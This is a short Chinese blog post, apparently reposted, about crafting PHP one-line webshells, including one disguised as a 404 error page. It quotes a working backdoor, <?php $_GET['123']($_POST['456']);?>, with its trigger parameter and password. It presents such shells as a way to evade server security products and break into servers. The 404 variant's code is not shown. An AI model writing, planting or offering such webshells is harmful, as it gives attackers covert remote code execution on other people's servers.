404错误版PHP一句话马

群里一基友发了个变异一句话,代码:

看了下,不错。
另外一基友给出:<?php $_GET[‘123’]($_POST[‘456’]);?>文件名?123=assert   密码456
都是很给力的一句话啊。
哥心里也痒痒的,于是自己就试着搞一句话。
核心代码如下:

然后扩展,最终哥把他弄成404一句话。
直接图:

现在服务器上的神马安全狗,D盾,守护神各种神器,搞得我等菜鸟,有孔难入
只好自己打造自己的马,来射进服务器!

本文转自ydmjj(ysbin)博客由网络安全攻防研究室(www.91ri.org)信息安全小组收集整理。